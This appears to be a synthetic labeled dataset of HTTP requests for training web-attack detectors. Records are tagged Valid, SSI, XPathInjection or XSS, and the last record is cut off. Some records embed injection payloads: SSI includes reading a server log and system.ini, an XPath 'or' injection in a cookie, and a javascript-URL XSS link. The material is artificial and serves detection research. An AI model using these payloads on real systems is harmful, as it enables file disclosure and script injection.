Referer: http://oksgc8n.uk/gjtein/z3bms/oei7fbb.tiff
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 3.9; b2-to; rv:8.5.2) Gecko/74799209
UA-CPU: 68000
UA-Disp: 7538,1606,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: vetdsn/7.3 10.87.225.35, hset/0.0 www.t7osgs.png, 0.4 65.75.190.47
Transfer-Encoding: deflate
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 154 95.111.78.82 "snmChTa3n" 
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30519
Start - Id: 39551
class: SSI
POST /1TosnrPD4cnc97.mdb? HTTP/1.0
Content-Length: 113
Content-Language: eda,s
Content-Encoding: deflate
Content-Location: http://www.oenebaE.ch/idteiaiv/uiorgu/teasrje/tmisPa.pl
Content-MD5: bWVlZXRhNG5zcGhpY3QwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Aug 05 16:48:36 CET
Last-Modified: Mon, 04 Sep 06 01:09:27 GMT
Host: 247.190.97.207
Connection: keep-alive
Accept: text/xml;q=0.0, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ia6-wElh;q=0.8, to-snats, ycr0ip-ascd;q=0.2, 4r-eeehtnr;q=0.8
Cache-Control: only-if-cached
Client-ip: 3.2.131.134
Cookie: oed6nHsCSa=%doirlue>gbgsoundy;rmAhtP2eiplE5ds=t;qse
Cookie2: $Version="6"
Date: Fri, 04 Nov 05 10:31:41 UTC
ETag: "jH5nNBEG4Q3ydGqFcPDi"
Expect: 100-continue
From: resjr@ovdSf3ie7i.biz
If-Modified-Since: Thu, 28 Jul 05 18:18:03 CET
If-Unmodified-Since: Sun, 10 Jul 05 16:59:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: tennta dsi10Hd=atah9ert
Authorization: rfejui tecolboq=iNrss8tl
Referer: http://www.naia7.biz/efeeait/5hhlh/ylidf/akenfGt.htm
TE: trailers
Trailer: Accept-Encoding
User-Agent: xgue5on5s/4.2.3.1.4
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color32
Via: FTP/7.1 94.79.90.11:60453, 3.6 www.t3uTwn.png:87, HTTP/3.8 40.112.111.113
Transfer-Encoding: deflate
Upgrade: ibhi3u/4.0, tAAin/1.9, ofae/4.1, dojnr/5.2
Warning: 450 34.203.181.155 "9ysrttp" 
X-Serial-Number: 11507528452920010282
----: --------------------
~~~~~: ~~~~~~~~~~~

NP7yweair=<!--     #include     virtual="/var/log/httpd/access.log"  -->&7al=itMmn&it0=hmj9

End - Id: 39551
Start - Id: 50057
class: XPathInjection
POST /yu9dc6anlxh/d7/4passthrubM5BechoPVDb5Z/JtuP65EIk-djN/e41Z/openGq7n41NOtdivrcpC/n33m/om8grotale9o/oQAGt0UDokFk3T4ug7Wi/rneTuseiemxjmre8dee.msf? HTTP/1.0
Content-Length: 134
Content-Language: lejsirnh
Content-Encoding: deflate
Content-Location: /Itoe6a/c80sexoi.nsf
Content-MD5: MG9oenBlc2VocEV0cmthaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 09 12:23:23 CET
Last-Modified: Wed, 12 May 04 21:10:49 UTC
Host: 215.135.244.96
Connection: twordc
Accept: */*;q=0.2
Accept-Charset: windows-1252, isiri-3342;q=0.1, macintosh;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: fysine-nSns;q=0.1, dni-esy, e-rhfnKei;q=0.4, adlHoni-0yretadu, fodm1t-i;q=0.2
Cache-Control: max-stale
Client-ip: 151.160.193.118
Cookie: aa=1543;nxtvae=n2sr;RLP_KcrQ58=t~eao9aoT1te(;iyyt=65238;utheeg=Ae' or     path/child::node()[position()=N]   or  'zariar4' =   '
Cookie2: $Version="46"
Date: Sun, 24 Jun 07 15:52:21 CET
ETag: "9kZS3VS67ZNg3Htsgqj"
Expect: 5soeike
From: tndo@hOino.uk
If-Modified-Since: Thu, 28 Oct 04 18:21:49 CET
If-Unmodified-Since: Sun, 29 Jul 07 19:04:32 GMT
If-Match: "_f9cfGzzctl4FGILIt-"
If-None-Match: "SKZ0XwpWJ-igJN5@rFa"
If-Range: Sat, 29 Dec 07 20:05:15 CET
Max-Forwards: 06
MIME-Version: 1.9
Pragma: cmeiujcd=mouod
Proxy-Authorization: NTLM cnVlNWliOXNhbkZvQTNlaWxpcmxtejZlZWl0YWVvZGh0UW83aTRpc3JhdHQ=
Authorization: NTLM YWZlb3V1a2hlZ3MzcGh0bmNvdGhRNnRzaHNlZG91dG8=
Range: 52839-,942-53,-81200
Referer: /hNMv/uo3p/pealG/eutonc.gz
TE: chunked;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (compatible; MSIE 9.8; WinNT; i5ces)
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: FTP/2.6 www.bOiod.jpeg, 6.9 18.84.11.137
Transfer-Encoding: compress
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~

cla6ssnyrPWroeG=I&ra=g1QE&o7nrbidlrn=9&rwrEmhrlo=wen&5Endbean=jRYglaQ&ls9htdtaa0=8&ruw=n r0d0)htboot.inidiv (bhttpbsoaccess_logusr

End - Id: 50057
Start - Id: 2866
class: Valid
GET /lFS43W@7processing-instructionWqBI/t-d/8vyU/makrrrE4cln/Res2roE3m.php3?aarcom=%5B HTTP/1.0
Host: www.i4Ieefrte.gov:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, deflate, gzip
Accept-Language: *;q=0.2
Cache-Control: min-fresh=9
Client-ip: 158.206.60.147
Cookie: ftehrnmh=soiolSsu1Urv;WBIp7=eJU.X;passthru@Not=eo4se>
Cookie2: $Version="7"
Date: Wed, 24 Mar 04 24:26:33 UTC
ETag: W/"ooz9rZCcNxKtGs@"
Expect: 100-continue
From: amatu@3ain.cz
If-Modified-Since: Tue, 09 Oct 07 09:19:44 CET
If-Unmodified-Since: Fri, 28 Mar 08 08:20:28 UTC
If-Match: *
If-None-Match: "DbdUhM3_VBlXZxkQoc"
If-Range: Fri, 25 Nov 05 12:35:03 GMT
Max-Forwards: 857
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic UXdiTTplaWJv
Authorization: Digest cnonce="Ih6su"
Range: 02742-7
Referer: /Hee9est/xtatt5C.swf
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 6.4; ep-oT; rv:0.4.3) Gecko/14044665
UA-CPU: 68000
UA-Disp: 7777,5626,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 640x6169
Via: 4.8 www.avnse.gif, 6.6 www.olfo.gif, FTP/3.4 58.125.77.225
Transfer-Encoding: compress
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 935 www.toai.html "yahrbo" "Thu, 01 Mar 07 01:43:53 UTC"
X-Forwarded-For: 152.90.170.86
X-Serial-Number: 62195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2866
Start - Id: 32744
class: Valid
POST /K_aPIb0Qhttps/fithheeetTati/slrsaosec8ewyo0ed/2dox@Q73/q6r3@TK79kTplbW/2ENwKtkK.exe? HTTP/1.1
Content-Length: 235
Content-Language: 4,mkjE
Content-Encoding: deflate
Content-Location: /nontly2/hodner.css
Content-MD5: bm1mZGF0dGJ0Y242c3N1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Nov 07 14:31:08 GMT
Last-Modified: Wed, 28 Jul 04 13:16:22 GMT
Host: 242.99.223.112
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.7, deflate;q=0.5, compress
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 33.225.104.136
Cookie: 6und=dtetelePneenmerr1
Cookie2: $Version="215"
Date: Sun, 03 Jun 07 11:04:33 UTC
ETag: "DQIA4FNXk3bUu6jCig"
Expect: meAIe
From: ynuuOeYe@e4oe.com
If-Modified-Since: Thu, 30 Jun 05 02:37:07 CET
If-Unmodified-Since: Thu, 27 Oct 05 11:30:01 CET
If-Match: "l9RDjivVEVHkJJ-P7"
If-None-Match: *
If-Range: Thu, 01 Nov 07 08:55:56 UTC
Max-Forwards: 3
MIME-Version: 2.1
Pragma: s3nrwt=e
Proxy-Authorization: Digest qop=igkvtyr
Authorization: Basic OXVuYTpuc2ww
Range: -0
Referer: http://www.x8ma4hAd.it/pe1Gnpee.js
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: hceueeb (ohU6y.U; iSn3mwTtec)
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1032x4856
Via: FTP/3.2 www.mkIaes.png, 2.7 231.206.184.11
Transfer-Encoding: deflate
Upgrade: ndu/3.8
Warning: 192 5.69.98.20 "aslrVau" 
X-Forwarded-For: 140.43.85.187
X-Serial-Number: 16114956793159
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

STPservicesvarzWcEe=s|a&includextermn7xu9CSYm=93890584&DoconnectV=Bd3me0srnjfgnecH&seoabJwemzbT=lq&8er=naeoo~1% 'lS7fqw2x\&tdA=492&runl=2'9u&nvdep0sfsws=<sc&deE14boot.inijBu6R=9&wh=166&eiftp=bn&AtubErtrth=6h httpootdnotcy

End - Id: 32744
Start - Id: 6525
class: Valid
PUT /eenwdPwyk5/ynZaccess_logUdryfrom/yFmtJ_@grfel7Pnv4suK/g4G2t-a6/cSXzR9-z_t/@qM-6HDLuZm/8heE/huJNATUWlP/7lG2/abwn22nn-R/@bFH_-e1X@/jMCo@hAT3.php3? HTTP/1.0
Content-Length: 105
Content-Language: sfn
Content-Encoding: deflate
Content-Location: http://www.Taddhat.ch/wkarSsw.png
Content-MD5: dXRxaHNuY2Nvc280YmJOZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Dec 07 18:24:25 UTC
Last-Modified: Tue, 13 Jul 04 23:15:33 UTC
Host: 113.106.128.170
Connection: iimuoeH
Accept: image/jpeg, video/mpeg, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: heWhEoer-ulaifl, fwiset-enN4u0n;q=0.6, Sevy4hr-s;q=0.1
Cache-Control: no-store
Client-ip: 167.47.12.124
Cookie: v1xowaubl3ilOoA=oeaotbo1plrndsove;aeedyie=<'7 r;inocnoayilo=samSnph-nRmi':k%'
Cookie2: $Version="99"
Date: Mon, 04 Sep 06 11:02:12 CET
ETag: "yKqbnfWf7kS7zVdJhcWt"
Expect: ntnaeils
From: eraitano@Iaobvr.biz
If-Modified-Since: Wed, 02 Jan 08 24:09:19 CET
If-Unmodified-Since: Sat, 18 Feb 06 17:53:43 GMT
If-Match: "D9IqozNpFftH9mym"
If-None-Match: *
If-Range: *
Max-Forwards: 560
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM TEhvbm1kbGlyYWRUZGFvUmhyYTlvcnNwb3JkbnRpYThuag==
Range: 7445-3026
Referer: http://www.9lpgwbre.de/l2si.bin
TE: deflate
Trailer: Warning
User-Agent: Mozilla/4.2 (compatible; MSIE 2.6; Linux i386; a1ienhq; oeatyid0s; uoest)
UA-CPU: Sparc
UA-Disp: 623,166,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9481x739
Via: 2.0 211.215.117.218
Transfer-Encoding: itdda; i9lat=yaiqnkd
Upgrade: asnuSd/5.6
Warning: 401 www.yflyvq.jpeg "rwrb3hyxExhn" 
X-Forwarded-For: 123.178.111.60
X-Serial-Number: 602584220
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

au1iTqnt=5&Irodt=71&cn3t4eemt=sljEfi&zfYYorTf77Iu=5L&nsie7Ho=409153799&wsrc5TuiigEn=509&iBQslByw=45666317

End - Id: 6525
Start - Id: 15870
class: Valid
GET /winntfk5ZuAFinclude/nDcmdTformz/_kYx1flV/JyTxiJ/I1usr4-Ki0FFO.php?ositfyt=sWRAotbl%40&rupaafdn=a%40UMtuMSd&hde=8&CPrb8UBe7P=d9Vs__&8VwhcjnfUt=iw%5Cmocha%3Chlaoez%3Bandmochaomail%29h&v9Gh0tF=34&0W6VE6acceptm@XNI=s6e HTTP/1.1
Host: www.pntseit.net
Connection: close
Accept: text/*;q=0.9
Accept-Charset: iso-8859-7;q=0.3, iso-8859-3;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 5.20.235.84
Cookie: eoch4i9dayen=27 ein1uBhedeleteno;dsedaySU5aSazh=r-lklHbN
Cookie2: $Version="446"
Date: Fri, 26 Nov 04 24:32:51 GMT
ETag: W/"RMcT4tkLPvog1osWLHoI"
Expect: 100-continue
From: oh9y8fhi@dik4gedttt.ch
If-Modified-Since: Tue, 17 Feb 04 20:33:51 GMT
If-Unmodified-Since: Sat, 13 Dec 08 11:47:04 UTC
If-Match: "CyDQ4Maak7zRh0Ad"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM c3JibW50YWVpdDdpSWRzc2FpdHJSdmFleWFzb0J0RHVhYXM2dDI=
Authorization: Digest nc=C6b3600e
Range: 782037-,-78,7952-96
Referer: http://tZnTil.com/fhgqd/o3wE.mspx
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.8 (Windows; U; Win98 1.2; at-ry; rv:9.0.3) Gecko/84228564
UA-CPU: StrongARM
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 901x093
Via: HTTP/2.0 www.ets6eitH.gif
Transfer-Encoding: deflate
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 852 www.Fiwtsn.shtml "ihfsh8jdypliiiwuwpzx" "Sun, 04 Jan 09 23:10:37 GMT"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15870
Start - Id: 859
class: Valid
GET /ta8eeo0veaiakeOEee.mdb?eNrpa5tcgai=e+KiframedivO19 HTTP/1.1
Host: www.jSrtC.de:737
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-2022-kr;q=0.4, iso-8859-1;q=0.2, x-mac-cyrillic, euc-tw
Accept-Encoding: gzip, deflate;q=0.0, deflate;q=0.5, identity;q=0.9
Accept-Language: *
Cache-Control: min-fresh=939
Client-ip: 91.43.148.55
Cookie: a78sgiieMwls=enkA5Gva4;gsnha4htveey=4+ Et;fooalSnbhoirtr=12
Cookie2: $Version="73"
Date: Tue, 03 Jul 07 09:32:04 UTC
ETag: "z.JVt4yr9ZxbvMY_0PAC"
Expect: 3Acucqeu=suoc;Osamam
From: a1evt@iee3eeDn.it
If-Modified-Since: Tue, 23 Oct 07 09:28:28 UTC
If-Unmodified-Since: Sun, 24 Jul 05 18:42:48 GMT
If-Match: "@1WNQmSozVbIWs_q"
If-None-Match: *
If-Range: "w3UxByrtkS_IVAq6Bi"
Max-Forwards: 131
MIME-Version: 4.5
Pragma: tdnze=o
Proxy-Authorization: NTLM NW5qZXdhaW1ybzNpc2FybDBhc25zZXhpRW5kVGUzaTdldGk1MGFr
Authorization: NTLM aHJzbzZmbWNTeXRobXI3cm9PYnV0am5ib3R4ZWhyZGFjbnZlYW5hcnVlc25v
Range: 95471-
Referer: /ekMq/ildtone/n4ti/iRAdc/ueae.bin
TE: chunked
Trailer: Referer
User-Agent: lYm7H9zl http://www.nner.st
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: 7.0 www.tte97a.jpg:0
Transfer-Encoding: identity
Upgrade: egr3ra/0.6, ttlAni/8.2, lss/8.2, Nehhrl/4.6, vSE/1.0
Warning: 053 www.usea.shtml "nnlclr4ng" "Mon, 14 Aug 06 16:09:38 CET"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 859
Start - Id: 1442
class: Valid
GET /fs/ewitx7/TcscoMaolhw/hjK8rcpaP3Ugftp/5eBxH5hHLLkgNCvIw@9R/3XDJhNLUTS..-bYcTB/rCOp9rRlNNsGJR_I..exe? HTTP/1.0
Host: www.ciVenaiqt5.be
Connection: close
Accept: text/*;q=0.8, image/*
Accept-Charset: utf-8;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: fro=eokcmufh
Client-ip: 35.203.201.157
Cookie: rArltTnpbana=ierpwlrtiHnaeh0lta;rxsNa=2636869360;ttwAR=554443;6LQK_7@xychild=tOnait6
Cookie2: $Version="25"
Date: Fri, 11 Dec 09 09:02:36 GMT
ETag: "LYovAsKMI9y4l-He"
Expect: erlnk
From: oOaeifaU@dedahe.st
If-Modified-Since: Mon, 01 May 06 13:31:49 GMT
If-Unmodified-Since: Sat, 29 Oct 05 15:47:53 GMT
If-Match: "lABwTsMBX4cxEy4jW5"
If-None-Match: "bsFl2DDgQz1Uro@P9."
If-Range: Fri, 28 Nov 08 21:03:36 UTC
Max-Forwards: 1602
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: Basic d3ZhdXJoOkhHYXRsaHRF
Range: 83459-80,-466746,901257-2338
Referer: /sbteS.swf
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: dwocneuo5ioert
UA-CPU: x86
UA-Disp: 9398,510,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 226x4570
Via: 6.1 www.oun9Aefs.gif
Transfer-Encoding: deflate
Upgrade: ltio/4.5, thNreo/7.1, ree/6.8, i1dcSb/6.6, nqw/3.3
Warning: 674 176.177.145.209 "w8sNts" 
X-Forwarded-For: 66.25.86.177
X-Serial-Number: 05220584581444
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1442
Start - Id: 16705
class: Valid
GET /0iq/WezBobjectUXF/GY@h_img/SftpYU/aw5LEw/-PxtermPKx/Q1rM8biu9pO3xOF/licBtn/-QLQWKf/vrteueatAeusifs/cobTIn/bPV-3IinubgsoundSAimNZ.jpeg? HTTP/1.0
Host: 13.47.78.207
Connection: close
Accept: application/postscript;q=0.3, application/*;q=0.2
Accept-Charset: iso-8859-4;q=0.6, iso-8859-2;q=0.6, windows-1257;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 25.65.22.29
Cookie: noolTti=i1arta;lea144h=imeEa2j ;Itlunsje=eU|]0%0l;76ElocationLl=Ojgaagranhee;eqyhuIh3evi=Dboot.ini;daiaea8eenE=u3S@XGXsGcmM
Cookie2: $Version="706"
Date: Sat, 22 Oct 05 21:21:51 UTC
ETag: "M5uXp5W.8Kidj00P"
Expect: euhrei6
From: o6botttt@Meerth.org
If-Modified-Since: Sun, 11 Jun 06 19:16:50 CET
If-Unmodified-Since: Mon, 19 Apr 04 14:46:57 GMT
If-Match: "0NPsTa1xKSce7skK1v8"
If-None-Match: "Nq2N8AKUEqM6XATEyIwA"
If-Range: Thu, 20 Dec 07 05:57:27 UTC
Max-Forwards: 923
MIME-Version: 2.5
Pragma: eeAaa=mMla7kS
Proxy-Authorization: Basic cm50emlpbjo3aWluaTh0Zg==
Authorization: Basic Z21udHU6MW5Eb2lS
Range: 735-128151,-280736
Referer: /mmd8a/teq8g.asmx
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: Mozilla/8.9 (Windows; U; WinNT 6.6; lc-tD; rv:8.3.4) Gecko/41265559
UA-CPU: x86
UA-Disp: 7604,2520,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2598x289
Via: 6.5 www.tfOtdRsZ.shtml
Transfer-Encoding: deflate
Upgrade: tTSo/0.6, eil/2.9, vFecn/4.4
Warning: 930 96.102.226.255 "rmts" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16705
Start - Id: 40490
class: SSI
GET /FbetweendivDVHVuN7jJ9Y/3eoAUJSvRyadE/8o5nnaz/p2G-Bqz/mgA3pRkJfu@zAY5xy8/nzisiehlG9lpuT/Ikrbetweenpv/bOdi/VxowtlSaccept39mqNFd/3rgraRogiIsefaan.php3?lEb=m%26&passwdDzw.8ylu=k161ZO3I&btzGAT4bgsound@=ae0ie&TMtItbe8oxmhq=f+s+yl3n&tcnel01boledgwh=hWsceofqped2r0st6r&acSamketnae=omeErtmprrm&Petat1fjiu1ll=5&difriatwoEbbb=%3C%21--%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&eonhpo7cmrtrtr=4149357&0oeoy98ne=odshmDtgsTa&Tl6oritm8axiE=53359932 HTTP/1.0
Host: 194.235.166.210
Connection: close
Accept: image/*, audio/*;q=0.0
Accept-Charset: utf-8;q=0.3
Accept-Encoding: deflate, deflate
Accept-Language: i6baljwu-pAeo;q=0.0, oniamT-e;q=0.5, ftscgte-rer6, clsrfge-mhh, e-y
Cache-Control: no-transform
Client-ip: 191.31.19.42
Cookie: nuHerns=s/ir0ugr;23mrsen=on0UzZV85f;os1y=965;VCcpEallJ=0745
Cookie2: $Version="696"
Date: Sun, 07 Mar 04 18:19:43 CET
ETag: W/"2I2TG1yCP5g9eFfUR"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Thu, 27 Oct 05 04:28:34 CET
If-Unmodified-Since: Thu, 06 Jul 06 22:10:49 CET
If-Match: "9UuyQOu4-ojSsHh02mI7"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic ZWx0cnVFYTo1ZWRkb2Vj
Authorization: dieeti mdri=t5rlnOn
Range: 120-,-29
Referer: http://Nstthr.de/r4ulmprs/1aaspdEd/u4paht1.gif
TE: deflate,chunked;q=0.8,trailers
Trailer: Warning
User-Agent: ndeInq4wh (rkPucB3; oDMLDURTGk)
UA-CPU: StrongARM
UA-Disp: 609,4490,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: 2.3 208.108.86.29, HTTP/3.0 114.118.211.239
Transfer-Encoding: 01nt
Upgrade: eiHn/0.0, mn7n9/4.3, Nko/4.4, wda/1.3, 7itb/8.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 55598980904343059452
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 40490
Start - Id: 46710
class: XSS
GET /hvRgDNidreplace/sRtt1hphounurnIahei/WiframexhtpassdcopyVQ/lEet/ry2IWla3MpVDDd/EeopngAtyn1Nco/childK.shtml?4rSvwiv=278&eecmEso=393675&sr=95&westa=47603&mgYBRh=uup.Efe&lEo7aAdwefjiw2=rl2&7CJ8unGSz=aeadReehoD&Skrh=9706628&s5ootols=6583704541&TAMlOv=na&lsrncotaiAOgto=endaccess_logKNibinUIi%3Ba%255s HTTP/1.0
Host: 72.148.110.46
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 8.1.3.78
Cookie: dQhtyhre6atut=<a    href  =  "javas&#99;ript&#35;[alert ('ih1rxnoe');]  "    >
Cookie2: $Version="61"
Date: Sat, 24 May 08 24:48:00 GMT
ETag: "yqrUkSjiQmV2G4o"
Expect: 100-continue
If-Modified-Since: Thu, 06 Sep 07 21:08:22 CET
If-Unmodified-Since: Sat, 08 Dec 07 14:49:59 UTC
If-Match: "ho0Y9uOAF_3pkF1.s"
If-None-Match: "v__..Vi_EYqXGnQxAS@m"
If-Range: Sun, 11 Mar 07 09:03:07 CET
Max-Forwards: 65
MIME-Version: 6.9
Pragma: utnbCysF=nw
Proxy-Authorization: bSrc 7nab=gLeowe
Authorization: NTLM bTAxY3R2ZTVlN3NsaWg1RWxzYmVRYXNlczlhaWVzQWFy
Range: 42963-61
Referer: /hhAearso.dll
TE: trailers,chunked,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 9.8; ox-en; rv:9.4.4) Gecko/98860967
UA-CPU: x86
UA-Disp: 4598,3171,32
UA-Pixels: 461x6638
Via: FTP/0.6 www.pDfrgEzL.htm:44741
Transfer-Encoding: gzip
Upgrade: tesb/9.3, ce8i5u/6.6
Warning: 946 www.roit.css "gwtlahs9th4ae" "Fri, 11 Nov 05 18:35:56 CET"
X-Forwarded-For: 40.45.63.28
X-Serial-Number: 96347754197329
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46710
Start - Id: 23316
class: Valid
GET /autoexecrvJBwcupdatereplacenO/tGp9Nhwd/2BFuxcqhs9x0LGCOy/pmnwith/yxT7/4yzoIrhi/oTMlpc4eVM_gjIMGPFDr/shsqt3.png?aApra=%3Da6&ieeitceiet=euatraa2raisghY4&Mhehbtdmortdte=tns HTTP/1.0
Host: www.yht9i3r.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 118.31.94.250
Cookie: intCdaR=Nr1huaiss
Cookie2: $Version="186"
Date: Fri, 16 Nov 07 19:33:50 CET
ETag: W/"ynrqS@txFebq1J5v8"
Expect: tdhiwn6
From: nj1rhh3i@oh7torqhee.uk
If-Modified-Since: Sun, 20 Jun 04 04:42:55 GMT
If-Unmodified-Since: Mon, 28 Mar 05 02:47:31 CET
If-Match: *
If-None-Match: "nkJrZukibFvTLqQDq5T-"
If-Range: "frcmAj5xAb6L@Esn"
Max-Forwards: 770
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: Digest cnonce="ahusit"
Range: 56641-,-4,2-
Referer: http://www.0Aert.biz/07h6eacI/Etehim/uyntwCuu/itjnl.exe
TE: deflate,trailers
Trailer: Accept
User-Agent: Mozilla/6.0 (Windows; U; Win98 3.5; tt-da; rv:7.5.7) Gecko/87937539
UA-CPU: PowerPC
UA-Disp: 904,7964,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9006x6282
Via: 4.3 216.67.141.109
Transfer-Encoding: deflate
Upgrade: eeer/9.5, ezn/0.2, eeM/5.1, hiAKQE/1.2
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 93.28.77.128
X-Serial-Number: 088223
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23316
Start - Id: 30090
class: Valid
GET /o1zoWpyt/ul2gIVQITBpm/ezU0nXt-z4fARKC/eAdXQEwIaP57NlQ6IC/oRFI/5oHynTdf2Ebe/eegcEttenl0hap/N65al/nt/DDJZ/eNlFKHw0OblPiGNIwJC_.js?aa2l4ddf1=p%3Etroeam&tbvo=hh&ha=nzteBt8eub0ei&icj0ronnrmabmqu=t&AjYJkkLCg=eE_UGt2YnDvP HTTP/1.0
Host: 164.182.129.73
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: O-addyujo, ezHteHU-7d
Cache-Control: min-fresh=83188
Client-ip: 207.197.128.199
Cookie: hsrdyCfle5atag=98;e1vradsR2rifI=581;se=2945853334;nN=r6w2tcres5rlwadtI;7SrUhZgroup byV=eitdtrst
Cookie2: $Version="23"
Date: Sun, 20 Sep 09 09:33:58 UTC
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 100-continue
From: uaHi@yedijoahj.de
If-Modified-Since: Sat, 22 Sep 07 13:00:08 CET
If-Unmodified-Since: Tue, 01 Jul 08 13:59:47 GMT
If-Match: "HqhfjY@K4oSuI5UdB7Ev"
If-None-Match: *
If-Range: Sat, 26 Jan 08 08:13:08 UTC
Max-Forwards: 4549
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: eusrb oaUM=teyle
Range: -551
Referer: /66Ien/Uwbtz/Ce0au/uuaidr.mdb
TE: gzip
Trailer: Connection
User-Agent: Mozilla/1.7 (X11; U; Solaris 4.9; et-rr; rv:4.4.8) Gecko/48170983
UA-CPU: x86
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 226x0520
Via: 3.7 121.244.135.16
Transfer-Encoding: gzip
Upgrade: AajeA/4.4
